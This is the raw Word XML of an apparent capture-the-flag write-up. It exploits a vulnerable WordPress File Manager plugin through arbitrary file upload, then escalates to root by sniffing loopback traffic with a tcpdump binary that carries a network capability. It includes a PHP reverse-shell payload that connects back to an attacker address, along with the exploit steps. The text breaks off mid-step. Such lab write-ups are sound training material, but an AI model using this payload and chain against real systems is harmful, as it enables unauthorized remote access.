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File Manager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uob8xw5rju81"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determine the running services and identify accessible ports. To accomplish this task, we will use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 a tool specialized in network mapping and service analysis.</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62100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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completing the scan, we identified the presence of only one web port: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">80</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340100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="57"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analysis, we determined that it is a completely static page, the default Apache2 page. We can explore an alternative approach by performing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fuzzing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to identify relevant information such as files or directories.</w:t>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92400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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running fuzzing, we identified the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“wordpress”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. By accessing this directory, we gained access to the WordPress CMS located at that route.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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44900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="52"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we can observe, the application did not load the CSS correctly. This happens because we have not yet added the domain to our hosts file. We can obtain the domain name by inspecting the page.</w:t>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76500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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93900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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1993900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After adding the domain to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the CSS loads correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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73400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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1urq23jakgfe" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WPScan</w:t>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WPScan is a black-box testing tool for scanning possible vulnerabilities in WordPress installations and their plugins.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/wpscanteam/wpscan</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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36800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56"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41600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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running the tool, we identified the presence of a plugin called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“File Manager”</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerable to unauthenticated arbitrary file upload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">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can obtain the exact plugin version by accessing the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">readme.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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92300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="59"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exact plugin version is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.0</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. After searching for exploits, we identified the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">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Version Affected: 6.0 to 6.8</w:t>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WordPress Plugin Wp-FileManager 6.8 - RCE</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">CVE-2020-25213 – webapps exploit for PHP platform</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/49178</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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this is an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">arbitrary file upload</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability, we can create a file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> containing our reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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&lt;?php system("/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;ip-vpn&gt;/4444 0&gt;&amp;1'"); ?&gt;</w:t>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181100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="47"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25">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701800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="55"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execute the exploit.</w:t>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33500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="66"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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can observe that the upload of our file was successful, and now we have the path to access the file, as shown in the exploit output.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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accessing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we successfully receive a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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98600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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943600" cy="1498600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1460500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading the simple shell to a fully interactive TTY:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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script /dev/null -c bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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3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31">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export TERM=xterm</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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accessing the root directory, we obtain the first flag:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">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524000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="67"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retrieving the first user flag, it is time to escalate privileges to obtain the final flag. For this, we must escalate to the root user.</w:t>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Using the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -nlapt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we noticed that port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1027</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is configured to accept connections only locally.</w:t>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executing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl 127.0.0.1:1027 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we received a response indicating that communication is limited to the root user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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38300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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12900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="49"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this context, we use the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getcap </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to verify whether any binary has specific capabilities.</w:t>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observed that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump</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binary has the capability </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cap_net_raw+ep. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This indicates it can be executed with elevated privileges, since it holds significant permissions at the network level. We can then use the following command to capture packets on the loopback interface:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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tcpdump -i lo -n -s 0 -A</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003C">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3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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1270000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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observe a request made to port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1027</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, passing the parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?admin=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a value that appears to be an MD5 hash. We can resend the same request to evaluate the response.</w:t>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the request with that parameter and value, we receive an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH private key</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We can use this key to establish an SSH connection as the root user.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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33700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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08300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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assigning the appropriate permissions to the SSH key:</w:t>
      </w:r>
    </w:p>
